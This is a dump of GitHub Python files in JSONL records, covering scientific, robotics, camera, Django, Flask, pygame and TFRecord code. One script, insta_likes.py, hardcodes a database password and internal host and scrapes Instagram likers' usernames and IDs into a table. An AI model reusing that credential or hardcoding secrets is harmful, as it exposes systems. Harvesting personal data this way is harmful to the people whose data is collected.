get_multilingual_text(self, values, not_null=True):\n \"\"\"\n Returns the set language of a multilingual text element.\n\n Args:\n values (str or dict): The multilingual values encoded as JSON.\n not_null (boolean): Throws an error if there is no value for this language.\n\n Returns:\n list of dict: List of dictionaries containing the multilingual representation.\n \"\"\"\n return [self.get_localized_text(values, not_null)]\n\n def get_localized_image(self, values):\n \"\"\"\n Returns the requested language of a multilingual binary image dictionary.\n\n Args:\n values (dict): The multilingual values encoded as JSON.\n\n Returns:\n dict of str: Dictionary containing the localized representation.\n \"\"\"\n default_language = Config.get('default_language')\n if self._language in values:\n return {\n 'Language': self._language,\n 'Image': values[self._language].encode()\n }\n else:\n return {\n 'Language': default_language,\n 'Image': values.get(default_language).encode()\n }\n\n @staticmethod\n def unaccent_lower(text):\n \"\"\"\n Replaces all special characters so that an alphabetical sorting can be done.\n\n Args:\n text (str): The text value.\n\n Returns:\n new_text (str): The text value converted to lower case and striped of special characters.\n \"\"\"\n if text is None:\n return ''\n new_text = text.lower()\n return unicodedata.normalize('NFD', new_text)\n\n def sort_by_localized_text(self, multilingual_elements, value_accessor, not_null=True):\n \"\"\"\n Sort a list of translated text elements alphabetically.\n\n Args:\n multilingual_elements (list of dict): A list of multilingual elements\n or dict that contains multilingual elements.\n value_accessor (function(dict)->string): A function to access the\n text of a multilingual object to us to sort the list\n\n Returns:\n list of dict: Alphabetically and language specific sorted elements\n if translations exist or the list of unsorted element if\n sorting failed.\n\n \"\"\"\n try:\n # Sort the list only if translations exist.\n return sorted(\n multilingual_elements,\n key=lambda element: self.unaccent_lower(\n self.get_localized_text(value_accessor(element), not_null)['Text']\n )\n )\n\n except AttributeError as ex:\n log.warn('Elements can not be sorted: {0}'.format(ex))\n return multilingual_elements\n\n @staticmethod\n def from_shapely(geom):\n \"\"\"\n Formats shapely geometry for rendering according to the federal specification.\n\n Args:\n geom (shapely.geometry.base.BaseGeometry): The geometry object to be formatted.\n\n Returns:\n dict: The formatted geometry.\n \"\"\"\n geom_dict = {\n 'type': geom.geom_type,\n 'coordinates': mapping(geom)['coordinates'],\n 'crs': 'EPSG:{srid}'.format(srid=Config.get('srid'))\n # isosqlmmwkb only used for curved geometries (not supported by shapely)\n # 'isosqlmmwkb': b64.encode(geom.wkb)\n }\n return geom_dict\n","repo_name":"openoereb/pyramid_oereb","sub_path":"pyramid_oereb/core/renderer/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9279,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"13924084231","text":"import statistics\nimport numpy as np\n\n\ndef time2freq(T):\n \"\"\"\n Converte o vetor tempo em frequencia\n :param T: Vetor tempo\n :return: Vetor frequencia\n \"\"\"\n\n dT = statistics.mean(np.diff(T))\n nT = len(T)\n nT2 = nT/2\n df = 1/(dT*nT)\n return df*(np.arange(-nT2, nT2))\n","repo_name":"mateussc12/ROF_DPO_DPSK","sub_path":"funcs/time2freq.py","file_name":"time2freq.py","file_ext":"py","file_size_in_byte":295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70350544487","text":"import pytest\n\nfrom multiprocessing import Queue\nfrom promptflow.executor._line_execution_process_pool import QueueRunStorage\nfrom promptflow.contracts.run_info import FlowRunInfo\nfrom promptflow.contracts.run_info import RunInfo as NodeRunInfo\n\n\n@pytest.mark.unittest\nclass TestLineExecutionProcessPool:\n def test_persist_node_run(self):\n queue = Queue()\n run_storage = QueueRunStorage(queue)\n node_run_info = NodeRunInfo(\n node=\"node1\",\n flow_run_id=\"flow_run_id\",\n run_id=\"run_id\",\n status=\"status\",\n inputs=\"inputs\",\n output=\"output\",\n metrics=\"metrics\",\n error=\"error\",\n parent_run_id=\"parent_run_id\",\n start_time=\"start_time\",\n end_time=\"end_time\",\n index=\"index\",\n api_calls=\"api_calls\",\n variant_id=\"variant_id\",\n cached_run_id=\"cached_run_id\",\n cached_flow_run_id=\"cached_flow_run_id\",\n logs=\"logs\",\n system_metrics=\"system_metrics\",\n result=\"result\",\n )\n run_storage.persist_node_run(node_run_info)\n assert queue.get() == node_run_info\n\n def test_persist_flow_run(self):\n queue = Queue()\n run_storage = QueueRunStorage(queue)\n flow_run_info = FlowRunInfo(\n run_id=\"run_id\",\n status=\"status\",\n inputs=\"inputs\",\n output=\"output\",\n metrics=\"metrics\",\n request=\"request\",\n root_run_id=\"root_run_id\",\n source_run_id=\"source_run_id\",\n flow_id=\"flow_id\",\n error=\"error\",\n parent_run_id=\"parent_run_id\",\n start_time=\"start_time\",\n end_time=\"end_time\",\n index=\"index\",\n api_calls=\"api_calls\",\n variant_id=\"variant_id\",\n system_metrics=\"system_metrics\",\n result=\"result\",\n )\n run_storage.persist_flow_run(flow_run_info)\n assert queue.get() == flow_run_info\n","repo_name":"Indie365/promptflow","sub_path":"src/promptflow/tests/executor/unittests/storage/test_queue_run_storage.py","file_name":"test_queue_run_storage.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69831644968","text":"import time\r\nimport datetime\r\nfrom datetime import datetime as dt\r\nimport ibm_db_dbi as db\r\nimport pandas\r\nimport instaloader\r\nimport time\r\nfrom itertools import dropwhile, takewhile\r\nimport urllib\r\nfrom urllib.request import urlretrieve\r\nimport os\r\ndef get_channels():\r\n\r\n connection_text = \"DATABASE=PRODDB;HOSTNAME=192.168.252.11;PORT=50000;PROTOCOL=TCPIP;UID=db2inst1;PWD=Qjuehnghj1;\"\r\n con = db.connect(connection_text, \"\", \"\")\r\n cursor = con.cursor()\r\n sql = 'select channel_id from tl_media_channels where source_id = 1002 order by id limit(10)'\r\n df = pandas.read_sql(sql, con)\r\n\r\n df['channel_id'] = df['CHANNEL_ID'].str.replace(\"'\", \"\")\r\n df1 = df['channel_id'].values.tolist()\r\n print(df1)\r\n channels_from_db = []\r\n\r\n for r in df1:\r\n print(r)\r\n channels_from_db.append(r)\r\n return channels_from_db\r\n\r\n\r\nL = instaloader.Instaloader()\r\n\r\n\r\nchannel_id = {'5644930763'}\r\n\r\nconnection_text = \"DATABASE=PRODDB;HOSTNAME=192.168.252.11;PORT=50000;PROTOCOL=TCPIP;UID=db2inst1;PWD=Qjuehnghj1;\"\r\ncon = db.connect(connection_text, \"\", \"\")\r\ncursor = con.cursor()\r\n\r\nfor id in channel_id:\r\n\r\n print('Downloading posts from ', id)\r\n profile = instaloader.Profile.from_id(L.context, id)\r\n group_name = profile.username\r\n group_id = str(profile.userid)\r\n count = profile.mediacount\r\n posts = profile.get_posts()\r\n print(count)\r\n if count > 100:\r\n stop = 100\r\n else:\r\n stop = count\r\n\r\n n = 1\r\n newpath = r'C:/Users/User/PycharmProjects/post_downloads/Media/' + profile.username\r\n if not os.path.exists(newpath):\r\n os.makedirs(newpath)\r\n for post in posts:\r\n\r\n likes = post.get_likes()\r\n for like in likes:\r\n user_name = like.username\r\n user_id = str(like.userid)\r\n count = 1\r\n print(user_name, ' ', user_id)\r\n time.sleep(1)\r\n cursor.execute('select count from insta_like_counter where user_id = \\'{user_id}\\' and group_id = \\'{group_id}\\''.format(user_id=user_id, group_id=group_id))\r\n one_row = cursor.fetchone()\r\n\r\n if one_row is not None:\r\n count = one_row[0] + 1\r\n print('Update {user_id} object.'.format(user_id=user_id), datetime.datetime.now())\r\n sql_update = \"update insta_like_counter set count = {count} where user_id = \\'{user_id}\\' and group_id = \\'{group_id}\\'\".format(count=count, user_id=user_id, group_id=group_id)\r\n cursor.execute(sql_update)\r\n else:\r\n print('Insert ', user_id, 'object.', datetime.datetime.now())\r\n sql_1_test = \"insert into insta_like_counter(group_name, group_id, user_id, user_name, count) values (?,?,?,?,?)\"\r\n cursor.execute(sql_1_test, (group_name, group_id, user_id, user_name, count))\r\n con.commit()\r\n\r\ncursor.close()\r\ncon.close()","repo_name":"IbragimovaS/Parser","sub_path":"insta_likes.py","file_name":"insta_likes.py","file_ext":"py","file_size_in_byte":2902,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19757338471","text":"#!/usr/bin/python3\n\n\n\nfrom robotiq_control.msg import CommandRobotiqGripperAction\nfrom robotiq_control.msg import CommandRobotiqGripperFeedback\nfrom robotiq_control.msg import CommandRobotiqGripperResult\n\n#from multinherit.multinherit import multi_super #pip3 install multinherit\nfrom robotiq_control.GripperCommon import RobotiqGripperType\nfrom robotiq_control.GripperCmd import GripperCommand\nfrom sensor_msgs.msg import JointState\nimport time\nfrom threading import Thread\nimport rospy\nimport actionlib\n\n\n\nGOAL_DETECTION_THRESHOLD = 0.01 # Max deviation from target goal to consider as goal \"reached\"\n \n\nclass RobotiqGripperActionServer(actionlib.SimpleActionServer, GripperCommand, rospy.Publisher):\n\n def __init__(self, action_server_name, gripper_type, slave_id = 0, usbComPort='/dev/ttyUSB0',baudRate=115200):\n self._action_name = action_server_name\n self.__feedback = CommandRobotiqGripperFeedback()\n self.__result = CommandRobotiqGripperResult()\n self._processing_goal = True\n self._seq = 0\n \n GripperCommand.__init__(self, gripper_type, id=slave_id, comPort=usbComPort ,baud_rate=baudRate)\n actionlib.SimpleActionServer.__init__(self, self._action_name, CommandRobotiqGripperAction, execute_cb=self.execute_callBack, auto_start=False)\n rospy.Publisher.__init__(self, 'joint_states', JointState, queue_size=10)\n\n whatchdog_connection = rospy.Timer(rospy.Duration(15.0), self.__connection_timeout, oneshot=True)\n while not rospy.is_shutdown() and not self.initialize():\n #rospy.sleep(1)\n rospy.logwarn_throttle(5, self._action_name + \": Waiting for gripper to be ready...\")\n\n time.sleep(0.7)\n\n whatchdog_connection.shutdown()\n if self.is_ready():\n self.start()\n rospy.loginfo(\"Action server is Active\")\n else:\n rospy.loginfo(\"Gripper Is Connected but Can't Activate \")\n \n self.__feedback = self.__getStatusFeedback()\n \n\n def __connection_timeout(self, event):\n rospy.logfatal(\"Gripper on port %s seems not to respond\" % (self.com_port))\n rospy.signal_shutdown(\"Gripper on port %s seems not to respond\" % (self.com_port))\n self._processing_goal = False\n\n def __movement_timeout(self, event):\n rospy.logerr(\"%s: Achieving goal is taking too long, dropping current goal\")\n \n def __getStatusFeedback(self):\n status = CommandRobotiqGripperFeedback()\n status.header.stamp = rospy.get_rostime()\n status.header.seq = 0\n status.is_ready = super().is_ready()\n status.is_reset = super().is_reset()\n status.is_moving = super().is_moving()\n status.obj_detected = super().object_detected()\n status.fault_status = super().get_fault_status()\n status.position = super().get_pos()\n status.requested_position = super().get_req_pos()\n status.current = super().get_current()\n print(status)\n return status\n \n def __PosError(self):\n return abs(self.__feedback.requested_position - self.__feedback.position)\n\n def __abortingActionServer(self, abort_error):\n rospy.logerr(\"%s: Dropping current goal -> \" + abort_error )\n self.set_aborted(self.__feedback , (self._action_name))\n\n def execute_callBack(self, goal):\n if not self.is_gripper_connected:\n self.__abortingActionServer(\"Connection Lost\")\n \n \n self.__feedback = self.__getStatusFeedback()\n rospy.loginfo( (\": New goal received Pos:%.3f Speed: %.3f Force: %.3f Force-Stop: %r\") % (goal.position, goal.speed, goal.force, goal.stop) )\n\n success = False\n rate = rospy.Rate(1)\n\n \n if not goal.stop:\n is_modbus_msg_sent = self.goTo(goal.position, goal.speed, goal.force)\n self._processing_goal = True \n else:\n rospy.logwarn_throttle(5, self._action_name + \": stop command is active\")\n\n if not is_modbus_msg_sent:\n self.__abortingActionServer(\"Unable to Send Modbus MSG\")\n \n watchdog_move = rospy.Timer(rospy.Duration(5.0), self.__movement_timeout, oneshot=True)\n\n while not rospy.is_shutdown() and self._processing_goal: \n \n if not self.is_gripper_connected:\n self.__abortingActionServer(\"Connection Lost\")\n \n self.__feedback = self.__getStatusFeedback()\n rospy.logdebug(\"Error = %.5f Requested position = %.3f Current position = %.3f\" % (abs(self.__feedback.requested_position - self.__feedback.position), self.__feedback.requested_position, self.__feedback.position))\n \n if self.is_preempt_requested():\n rospy.loginfo('%s: Preempted' % self._action_name)\n self.set_preempted()\n break\n\n if self.__feedback.fault_status != 0:\n self.__abortingActionServer(\"Fault status (gFLT) is: %d\" % self.__feedback.fault_status)\n self._processing_goal = False\n break\n if( self.__PosError() < GOAL_DETECTION_THRESHOLD or self.__feedback.obj_detected):\n self._processing_goal = False\n success = True\n print(success)\n break\n self.publish_feedback(self.__feedback)\n \n rate.sleep()\n \n\n self.__result = self.__feedback\n watchdog_move.shutdown()\n if success:\n rospy.logdebug(self._action_name + \": Goal reached or object detected Pos: %.3f PosRequested: %.3f ObjectDetected: %r\" % (goal.position, self.__feedback.requested_position, self.__feedback.obj_detected) )\n self.set_succeeded(self.__result)\n \n def setGripperJointNames(self, joint_name1, joint_name2):\n self._joint_name = [joint_name1, joint_name2]\n \n def publish_joint_states(self):\n rate = rospy.Rate(50)\n while not rospy.is_shutdown():\n if self.is_gripper_connected:\n # __feedback = self.__getStatusFeedback()\n js = JointState()\n js.header.frame_id = ''\n js.header.stamp = rospy.Time.now()\n # js.header.seq = self._seq\n js.name = self._joint_name\n js.position = [self.__feedback.position/2-self._xacro_frame_error, self.__feedback.position-self._xacro_frame_error]\n super().publish(js)\n rate.sleep()\n def set_xacro_frame_error(self, error):\n self._xacro_frame_error = error\n \n\n \n\nif __name__ == \"__main__\":\n\n rospy.init_node('robotiq_2f85_action_server')\n \n print('AS get Param')\n usb_port = rospy.get_param('~usb_port','/dev/ttyUSB0')\n name_finger1 = rospy.get_param('~name_finger1','ur5_bl_to_leftFinger')\n name_finger2 = rospy.get_param('~name_finger2','ur5_leftFinger_to_rightFinger')\n \n server_gripper = RobotiqGripperActionServer(action_server_name= \"robotiq_hand_e\", gripper_type = RobotiqGripperType.Hand_E, usbComPort = usb_port)\n server_gripper.setGripperJointNames(name_finger1, name_finger2)\n server_gripper.set_xacro_frame_error(0.008)\n thread_joint = Thread(target=server_gripper.publish_joint_states)\n thread_joint.start()\n \n # server_ur5e = RobotiqGripperActionServer(action_server_name= gripper_ur5e, gripper_type = RobotiqGripperType.Hand_E, usbComPort = \"/dev/ttyUSB0\")\n # server_ur5e.setGripperJointNames(\"ur5e_bl_to_leftFinger\", \"ur5e_leftFinger_to_rightFinger\")\n # server_ur5 = RobotiqGripperActionServer(action_server_name= gripper_ur5, gripper_type = RobotiqGripperType.Hand_E, usbComPort = \"/dev/ttyUSB1\")\n # server_ur5.setGripperJointNames(\"ur5_bl_to_leftFinger\", \"ur5_leftFinger_to_rightFinger\")\n # server_ur5.set_xacro_frame_error(0.008)\n # server_ur5e.set_xacro_frame_error(0.008)\n # thread_joint_states_ur5e= Thread(target=server_ur5e.publish_joint_states)\n # thread_joint_states_ur5 = Thread(target=server_ur5.publish_joint_states)\n # thread_joint_states_ur5.start()\n # thread_joint_states_ur5e.start()\n \n \n rospy.spin()\n ","repo_name":"GovoUnibo/robotiq_control","sub_path":"src/robotiq_control/GripperActSrvMdbsRs485.py","file_name":"GripperActSrvMdbsRs485.py","file_ext":"py","file_size_in_byte":8265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36839196244","text":"__all__ = [\"AndorSDK3\"]\n\nimport asyncio\nimport numpy as np\nimport os\n\nfrom yaqd_core import IsDaemon, IsSensor, HasMeasureTrigger, HasMapping\nfrom typing import Any, List, Union\nfrom . import atcore\nfrom . import features\n\nATCore = atcore.ATCore\nATCoreException = atcore.ATCoreException\n\n\nclass AndorSDK3(HasMapping, HasMeasureTrigger, IsSensor, IsDaemon):\n state_features: List[str] = []\n\n def __init__(self, name, config, config_filepath):\n super().__init__(name, config, config_filepath)\n self._channel_names = [\"image\"]\n self._channel_mappings = {\"image\": [\"x_index\", \"y_index\"]}\n self._mapping_units = {\"x_index\": \"None\", \"y_index\": \"None\"}\n self._channel_units = {\"image\": \"counts\"}\n\n initial_cwd = os.getcwd()\n try:\n os.chdir(os.path.dirname(__file__))\n self.sdk = ATCore() # Initialise SDK3\n finally:\n os.chdir(initial_cwd)\n # find devices\n device_count = self.sdk.get_int(self.sdk.AT_HNDL_SYSTEM, \"DeviceCount\")\n if device_count == 0:\n raise ConnectionError(\"No devices found.\")\n # select device\n for i in range(device_count):\n temp = self.sdk.open(i)\n serial = self.sdk.get_string(temp, \"SerialNumber\")\n if serial == self._config[\"serial\"]:\n self.hndl = temp\n self.logger.info(f\" Serial No : {serial}\")\n break\n self.sdk.close(temp)\n else:\n raise ConnectionError(\n r\"device with serial number {0} not found\".format(self._config[\"serial\"])\n )\n\n self.features = {}\n model = self._config[\"model\"][0].lower()\n assert model in \"ansz\"\n for k, v in features.specs.items():\n if model in v.availability:\n try:\n self.features[k] = features.obj_from_spec(self.sdk, self.hndl, v)\n except NotImplementedError:\n self.logger.warn(\n f\"feature {v.sdk_name} is supposed to be implemented, but is not!\"\n )\n else:\n self.logger.debug(\n f\"{k}, {self.features[k].is_implemented}, {self.features[k].is_readonly}\"\n )\n\n self.sensor_info = {}\n for k in [\"sensor_width\", \"sensor_height\", \"pixel_height\", \"pixel_width\"]:\n try:\n self.sensor_info[k] = self.features[k].get()\n except ATCoreException as err:\n self.logger.error(err)\n self.logger.debug(self.sensor_info)\n\n for key in self.state_features:\n fi = self.features[key]\n dest = self._state[key]\n if dest in [\"\", -1]: # unassigned, poll for current value\n self._state[key] = fi.get()\n else:\n try: # some things we cannot write to, even though we should\n fi.set(dest)\n except Exception as e:\n self.logger.error(e)\n # generate avro properties\n self.__setattr__(f\"set_{key}\", self.gen_setter(key))\n self.__setattr__(f\"get_{key}\", self.gen_getter(key))\n if self.features[key].type in [\"int\", \"float\"]:\n self.__setattr__(f\"get_{key}_limits\", self.gen_limits_getter(key))\n elif self.features[key].type in [\"enumerated\"]:\n self.__setattr__(f\"get_{key}_options\", self.gen_options_getter(key))\n\n async def _measure(self):\n image_size_bytes = self.features[\"image_size_bytes\"].get()\n buf = np.empty((image_size_bytes,), dtype=\"B\")\n timeout = max(self.features[\"exposure_time\"].get() * 2e3, 100)\n # 2e3: seconds to ms (1e3), plus wait twice as long as acquisition before timeout\n try:\n self.sdk.queue_buffer(self.hndl, buf.ctypes.data, image_size_bytes)\n # acquire frame\n self.features[\"acquisition_start\"]()\n self.logger.debug(\"Waiting on buffer\")\n (returnedBuf, returnedSize) = await self._loop.run_in_executor(\n None, self.sdk.wait_buffer, self.hndl, timeout\n )\n self.logger.debug(\"Done waiting on buffer\")\n self.features[\"acquisition_stop\"]()\n except ATCoreException as err:\n self.logger.error(f\"SDK3 Error {err}\")\n\n stride = self.features[\"aoi_stride\"].get()\n pixels = np.lib.stride_tricks.as_strided(\n np.frombuffer(buf, dtype=np.uint16),\n shape=self._channel_shapes[\"image\"],\n strides=(stride, 2), # binning works?\n )\n self.logger.debug(f\"{pixels.size}, {np.prod(self._channel_shapes['image'])}\")\n pixels = np.ascontiguousarray(pixels)\n self.sdk.flush(self.hndl)\n\n return {\"image\": pixels}\n\n def get_sensor_info(self):\n return self.sensor_info\n\n def get_feature_names(self) -> List[str]:\n return [f\"{k} -> {v.sdk_name}\" for k, v in self.features.items()]\n\n def get_feature_type(self, k: str):\n return self.features[k].type\n\n def get_feature_value(self, k: str) -> Union[int, bool, float, str]:\n feature = self.features[k]\n return feature.get()\n\n def get_feature_options(self, k: str) -> List[str]: # -> List[Union[str, float, int]]:\n feature = self.features[k]\n if feature.type == \"enumerated\": # isinstance(feature, features.SDKEnum):\n return feature.options()\n else:\n raise ValueError(f\"feature {feature} is of type {feature.type}. No options.\")\n\n def get_feature_limits(self, k: str) -> List[Union[float, int]]:\n feature = self.features[k]\n if feature.type in [\"int\", \"float\"]:\n return [feature.min(), feature.max()]\n raise ValueError(f\"feature {feature} is of type {feature.type}. No limits.\")\n\n def close(self):\n self.sdk.close(self.hndl)\n\n def _set_feature_by_key(self, key, val):\n self._loop.create_task(self._aset_feature_by_key(key, val))\n\n async def _aset_feature_by_key(self, key, val):\n if self._busy:\n await asyncio.wait_for(self._not_busy_sig.wait())\n self.features[key].set(val)\n self._state[key] = self.features[key].get()\n\n def gen_setter(self, key):\n def setter(val: Any):\n self._set_feature_by_key(key, val)\n\n return setter\n\n def gen_getter(self, key):\n def getter() -> Any:\n return self._state[key]\n\n return getter\n\n def gen_limits_getter(self, key):\n def getter() -> List[float]:\n return [self.features[key].min(), self.features[key].max()]\n\n return getter\n\n def gen_options_getter(self, key):\n def getter() -> str:\n return self.features[key].options()\n\n return getter\n","repo_name":"yaq-project/yaqd-andor","sub_path":"yaqd_andor/_andor_sdk3.py","file_name":"_andor_sdk3.py","file_ext":"py","file_size_in_byte":6860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71282120809","text":"from django.core.validators import MinValueValidator, MaxValueValidator\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom vsdk.service_development.models import CallSession, get_object_or_404\n\nimport logging\nlogger = logging.getLogger(\"mada\")\n\n\nclass ResultItem(models.Model):\n \"\"\"\n A result is a message element, associated to a self-check session\n \"\"\"\n session = models.ForeignKey(CallSession, on_delete=models.PROTECT, related_name=\"session_result\",\n verbose_name=_('Call session'), null=True, blank=True)\n symptom_no = models.PositiveIntegerField(null=True, blank=True,\n verbose_name=_('Number of confirmed symptoms'),\n help_text=_(\"The number of reported symptoms.\"))\n risk_no = models.PositiveIntegerField(null=True, blank=True,\n verbose_name=_('Number of confirmed risk factors'),\n help_text=_(\"The number of reported risks.\"))\n is_exposed = models.BooleanField(\n verbose_name=_('Exposed'),\n help_text=_(\"Whether the person has been exposed to the virus.\"),\n null=True, blank=True)\n infected_probability = models.FloatField(null=True, blank=True,\n validators=[MinValueValidator(0), MaxValueValidator(100)],\n verbose_name=_('Infection estimated probability'),\n help_text=_(\n 'The probability that the person has been infected, based on the configured parameters.'))\n is_infected_prediction = models.BooleanField(\n verbose_name=_('Self-check result'),\n help_text=_('Whether the person is believed to be infected after the self-check.'),\n null=True, blank=True)\n testing_recommended = models.BooleanField(\n verbose_name=_('Is testing recommended'),\n help_text=_('Whether testing is recommended.'),\n null=True, blank=True)\n testing_confirmation = models.BooleanField(\n verbose_name=_('Predicted result was confirmed by testing'),\n help_text=_('Whether the person tested positive for COVID-19.'),\n null=True, blank=True)\n\n class Meta:\n verbose_name_plural = _('Self-Check Results')\n\n def __str__(self):\n return _(\n 'Result: %s, exposure: %s, symptoms: %s, risks: %s, infected prediction: %s, confirmed: %s, testing result: %s') % (\n self.session,\n self.is_exposed,\n self.symptom_no,\n self.risk_no,\n self.is_infected_prediction,\n self.testing_confirmation is not None,\n self.testing_confirmation,\n\n )\n\n\ndef update_is_exposed_for_session(session=None, is_exposed=None):\n result_item = None\n try:\n result_item = get_object_or_404(ResultItem, session=session)\n logger.debug(\"Retrieved result item - {}\".format(result_item))\n except Exception as e:\n print(\"Could not retrieve result for session - {}\".format(e))\n result_item = ResultItem.objects.create() # create result item for session\n result_item.session = session\n logger.debug(\"Created new result item - {}\".format(result_item))\n finally:\n if not result_item.is_exposed: # can be updated only if False\n result_item.is_exposed = is_exposed\n logger.debug(\"Is exposed is - {}\".format(is_exposed))\n result_item.save()\n return result_item\n\n\ndef update_or_create_result_item_for_session(session=None, symptom_no=None, risk_no=None, is_exposed=None,\n infected_probability=None, is_infected_prediction=None,\n testing_recommended=None):\n result_item = None\n try:\n result_item = get_object_or_404(ResultItem, session=session)\n logger.debug(\"Retrieved result item - {}\".format(result_item))\n except Exception as e:\n print(\"Could not retrieve result for session - {}\".format(e))\n result_item = ResultItem.objects.create() # create result item for session\n result_item.session = session\n logger.debug(\"Created new result item - {}\".format(result_item))\n finally:\n # set result fields\n if symptom_no:\n result_item.symptom_no = symptom_no\n if risk_no:\n result_item.risk_no = risk_no\n if is_exposed is not None:\n result_item.is_exposed = is_exposed\n if infected_probability is not None:\n logger.debug(\"Set infection probability - {}\".format(infected_probability))\n result_item.infected_probability = infected_probability\n if is_infected_prediction is not None:\n logger.debug(\"Set infection prediction - {}\".format(is_infected_prediction))\n result_item.is_infected_prediction = is_infected_prediction\n if testing_recommended is not None:\n logger.debug(\"Set testing recommendation - {}\".format(testing_recommended))\n result_item.testing_recommended = testing_recommended\n\n logger.debug(\"Saving result item - {}\".format(result_item))\n result_item.save()\n return result_item\n\n","repo_name":"MadalinaDinga/KasaDaka-HealthVSDK-civic","sub_path":"vsdk/service_development/models/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":5430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23029532547","text":"from flask import Flask, make_response, request\n\n\napp = Flask(__name__, static_url_path='/examples', static_folder='build')\n\n\nWEATHER_DATA = {\n \"1\": {\n 'location': 'San Francisco',\n 'image': 'http://localhost:5000/examples/partly_cloudy.png',\n 'temp': 78,\n 'desc': 'Partly Cloudy'\n }\n}\n\n\n@app.route('/')\ndef home():\n return 'hello world'\n\n\n@app.route('/widget.js')\ndef weather_widget():\n zip = request.args.get('zip')\n data = WEATHER_DATA[zip]\n\n out = '''\n const container = document.getElementById('container')\n container.innerHTML = (\n '<div>' +\n ' <p>%s<p>' +\n ' <img src=\"%s\" />' +\n ' <p><strong>%s °F</strong> — %s</p>' +\n '</div>'\n )\n ''' % (data['location'], data['image'], data['temp'], data['desc'])\n\n response = make_response(out)\n response.headers['Content-Type'] = 'application/javascript'\n\n return response\n","repo_name":"Karimit/widget-server","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"340232478","text":"from typing import Optional, Tuple, Dict\nfrom abc import ABC, abstractmethod\n\nimport warnings\nimport pygame\n\n\"\"\" Default kwargs for all Ui elements (although some don't use them) \"\"\"\ndefault_kwargs = \\\n {\n 'has_border': True,\n 'border_width': 2,\n 'border_color': (0, 0, 0),\n 'font': 'Ariel',\n 'font_size': 30,\n 'text_color': (0, 0, 0)\n }\n\n\nclass UI(ABC):\n \"\"\" Base class for a UI element \"\"\"\n\n def __init__(self,\n rect: Tuple[int, int, int, int],\n params: Optional[Dict] = None) -> None:\n\n # Variables for UI elements\n self.x, self.y, self.width, self.height = rect\n self.rect = pygame.Rect(rect)\n\n # add default values for key worded arguments\n self.__dict__.update(default_kwargs)\n\n # update values for given key worded arguments\n for key, val in params.items():\n if key in default_kwargs:\n self.__dict__.update({key: val})\n else:\n warnings.warn(f'{key} not recognized')\n\n @abstractmethod\n def handle_event(self, event: pygame.event) -> None:\n \"\"\"\n Handles events of the UI element\n Should be called for every event in the game inside the game main loop\n :param event: pygame even\n :return: None\n \"\"\"\n pass\n\n def draw(self, screen: pygame.Surface, color: Tuple[int, int, int]) -> None:\n \"\"\"\n Draws the basics of the UI element-\n background and the borders\n :param screen: pygame display\n :param color r, g, b of color to fill borders with\n :return: None\n \"\"\"\n\n # Draw Bigger rect to create the illusion of a border\n if self.has_border:\n pygame.draw.rect(screen, self.border_color, (self.x - self.border_width,\n self.y - self.border_width,\n self.width + self.border_width * 2,\n self.height + self.border_width * 2))\n\n pygame.draw.rect(screen, color, self.rect)\n\n\n","repo_name":"roey-lifshitz/cnn-scribble","sub_path":"UI/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2159,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12440487358","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Aug 2 15:35:43 2018\r\n\r\n@author: n.muthuraj\r\n\"\"\"\r\n\r\nfrom random import shuffle\r\nimport sys\r\nimport cv2\r\nimport tensorflow as tf\r\nimport clean_data \r\n\r\n\r\ndef _int64_feature(value):\r\n return tf.train.Feature(int64_list=tf.train.Int64List(value=[value]))\r\ndef _bytes_feature(value):\r\n return tf.train.Feature(bytes_list=tf.train.BytesList(value=[value]))\r\n\r\ndef load_image(addr):\r\n # read an image and resize to (224, 224)\r\n # cv2 load images as BGR, convert it to RGB\r\n img = cv2.imread(addr)\r\n if img is None:\r\n return None\r\n img = cv2.resize(img, (224, 224), interpolation=cv2.INTER_CUBIC)\r\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\r\n cv2.imwrite(addr,img)\r\n return img\r\n \r\ndef createDataRecord(out_filename, list_images, labels):\r\n # open the TFRecords file\r\n writer = tf.python_io.TFRecordWriter(out_filename)\r\n for i in range(len(list_images)):\r\n # print how many images are saved every 1000 images\r\n if not i % 1000:\r\n print('Train data: {}/{}'.format(i, len(list_images)))\r\n sys.stdout.flush()\r\n # Load the image\r\n img = load_image(list_images[i])\r\n\r\n label = labels[i]\r\n\r\n if img is None:\r\n continue\r\n\r\n # Create a feature\r\n feature = {\r\n 'image_raw': _bytes_feature(img.tostring()),\r\n 'label': _int64_feature(label)\r\n }\r\n # Create an example protocol buffer\r\n example = tf.train.Example(features=tf.train.Features(feature=feature))\r\n \r\n # Serialize to string and write on the file\r\n writer.write(example.SerializeToString())\r\n \r\n writer.close()\r\n sys.stdout.flush()\r\n\r\n\r\nlist_images=clean_data.list_images\r\nlabels=clean_data.labels\r\n\r\nc = list(zip(list_images, labels))\r\nshuffle(c)\r\nlist_images, labels=zip(*c) \r\n \r\n# Divide the data into 60% train, 20% validation, and 20% test\r\ntrain_list_images = list_images[0:int(0.6*len(list_images))]\r\ntrain_labels = labels[0:int(0.6*len(labels))]\r\nval_list_images = list_images[int(0.6*len(list_images)):int(0.8*len(list_images))]\r\nval_labels = labels[int(0.6*len(list_images)):int(0.8*len(list_images))]\r\ntest_list_images = list_images[int(0.8*len(list_images)):]\r\ntest_labels = 